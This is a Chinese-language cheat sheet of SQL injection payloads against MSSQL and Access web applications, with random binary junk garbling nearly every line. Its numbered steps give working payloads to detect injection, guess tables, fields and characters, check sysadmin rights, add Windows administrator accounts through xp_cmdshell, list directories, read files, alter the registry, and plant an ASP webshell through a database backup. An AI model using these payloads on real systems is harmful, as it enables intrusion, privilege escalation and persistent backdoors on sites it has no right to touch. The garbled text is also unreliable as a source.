1.判断是否有注入;and 1=1 ;and 1=2 >���9KQWeD
2.初步判断是否是mssql ;and user>0 r2,A�Z+4FP
CYl�Z<�W'
3.注入参数是字符'and [查询条件] and ''=' �GM�LDmT�V
Mx&
P^#B3
4.搜索时没过滤参数的'and [查询条件] and '%25'=' G�S1Vcav<
�Q��5R7se_
5.判断数据库系统 nFE0y3GD8�
Sw!/�I��PO
;and (select count(*) from sysobjects)>0 mssql hN�%
h.�;s
bq�B��gq��
;and (select count(*) from msysobjects)>0 access 4E&�=�qC]S
jTjG�bC]�X
%�\xwu(|kN
�!L5���[�s
6.猜数据库 ;and (select Count(*) from [数据库名])>0 c o�}o$��}
4.@gV/U�(|
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 �I^'U_�"vB
N�[G�<&f9�
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 8p�3�p�w=p
�8!e1T,�:b
9.(1)猜字段的ascii值(access) �=l&A�9 >\
t�F>��� ?]
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ]A*v\Q�y��
D�FvLCGkDk
(2)猜字段的ascii值(mssql) ~��$I2{I#W
oe�1�Dm���
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 �O/;$0`~hY
�!�M]_CPh]
10.测试权限结构(mssql) +b��nz�%/v
n~/#�~VTVe
w`~j(�G4�N
x�@EEMO1_"
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- Rb_H�D���
Ep�m'u[w�V
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- neC�]\B[Xm
�e<�|'� ��
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- enu",�wC3�
�dm4d�T5�9
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- 7X�|�M\WUq
<{\U�E~���
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- ^%|(dMo4��
cpV��:���y
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- n1�Ag o3NM
�7Qd�U|1]
;and 1=(select IS_MEMBER('db_owner'));-- v�5i?4?-Z
P<iS7�Ys�+
a8f�L�j���
1zE_ �SNx
11.添加mssql和系统的帐户 VN�=S&iBa/
�a�^+b(&;k
;exec master.dbo.sp_addlogin username;-- #N-N�I+qX�
;exec master.dbo.sp_password null,username,password;-- ]#��hT!VOd
h[c�
HCVM:
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 5p&�&�E�A/
G
$u:1&��
;exec master.dbo.xp_cmdshell 'net user username password ~5aq.hF1,A
,nO:P�x�n|
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- yQQ[_�1$pq
Ugmg,~�U~k
;exec master.dbo.xp_cmdshell 'net user username password /add';-- ^�0�t8�1,`
E.Hw|y0_(|
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- %� ~%���>3
H9)$ #r6i�
?k4�O�)?28
lyzM�Kl�a"
12.(1)遍历目录 �yc,Qz.�+g
Mnpb".VU#T
;create table dirs(paths varchar(100), id int) U4*5o~!�=S
�D�]+t�r�%
;insert dirs exec master.dbo.xp_dirtree 'c:\' Py(l�+Ik`>
UQz8"�:�#V
;and (select top 1 paths from dirs)>0 tYt/m6h���
qIQ�vi�x$8
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) ;F@dN,�Y�
|N�[SCk>Kj
Y�W"?F��y�
1 s�CF
-r�
(2)遍历目录 o�?P(F�u�f
"42u0�rH0J
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- Fs:l"5~>�1
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 Jrlc%,pZ�
zk]6|i$!�I
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 (��,��\`?g
di�6A.�N5A
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 s#sr�1[9}G
9s)�YPlD�z
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 .a:Oj��3=0
2vKnxK+ 5
>VqMSe��_v
��<PkDfMx2
13.mssql中的存储过程 %>cc%(POO�
U�c
e#�v)�
xp_regenumvalues 注册表根键, 子键 ��6�<A�\U/
)|/t}|DIx�
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 /= P!9d
{
h�B<.�u���
xp_regread 根键,子键,键值名 Y VTY�{>�Q
C<A82u;t%@
;exec xp_regread }�}�~��^!�
K)GC&%_$O
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 ��Cg
�85��
�9a)�D���8
xp_regwrite 根键,子键, 值名, 值类型, 值 yo�V"?W�>!
k�Ys2AzS{d
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 {U�=�za1Ga
�uX�eB�OLC
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 j^Zp�BN��L
Jg
k@ti.}Z
xp_regdeletevalue 根键,子键,值名 /S9Mu
)1Y�
K1�z"..(2J
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 B7t�#�H��?
7 p�g8�kq@
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 Uy� �;�oJY
�=]7�|*-��
]5td,2E�
C
Mz����]LFM
14.mssql的backup创建webshell K�nZm(c�9+
�p�M�[UC�{
use model F5L/7�j�<}
�#:�Cr'U��
create table cmd(str image); ���0y'34�}
y�>8��!qVX
insert into cmd(str) values (''); (B]Vw�+��/
aq���s']��
backup database model to disk='c:\l.asp'; Q8�Usyc'�3
F>A-+]�X3o
IG +nr�TY0
}S�p�MHR`�
15.mssql内置函数 ��?Pmj�}f
!l6B_[�!�@
;and (select @@version)>0 获得Windows的版本号 9L:v$4{�LU
�e~rBV+�f
;and user_name()='dbo' 判断当前系统的连接用户是不是sa uK�(��+W�A
�jo�p�C�\Z
;and (select user_name())>0 爆当前系统的连接用户 \/K�>Iv�'$
�BY,%+>bc)
;and (select db_name())>0 得到当前连接的数据库 ��1�[3"|�
!^q<)!9<EO
�mM�T7`r;l
-lSm:O�@�'
16.简洁的webshell pSq\�3Hp]Q
`-E�N�Kr�]
use model =�]W{�u`��
5�bmtUIj
create table cmd(str image); m�!;m�EBL{
@ �n;W�VG
insert into cmd(str) values (''); ~n"V0!:'4�
IRo[|���&c
backup database model to disk='g:\wwwtest\l.asp';
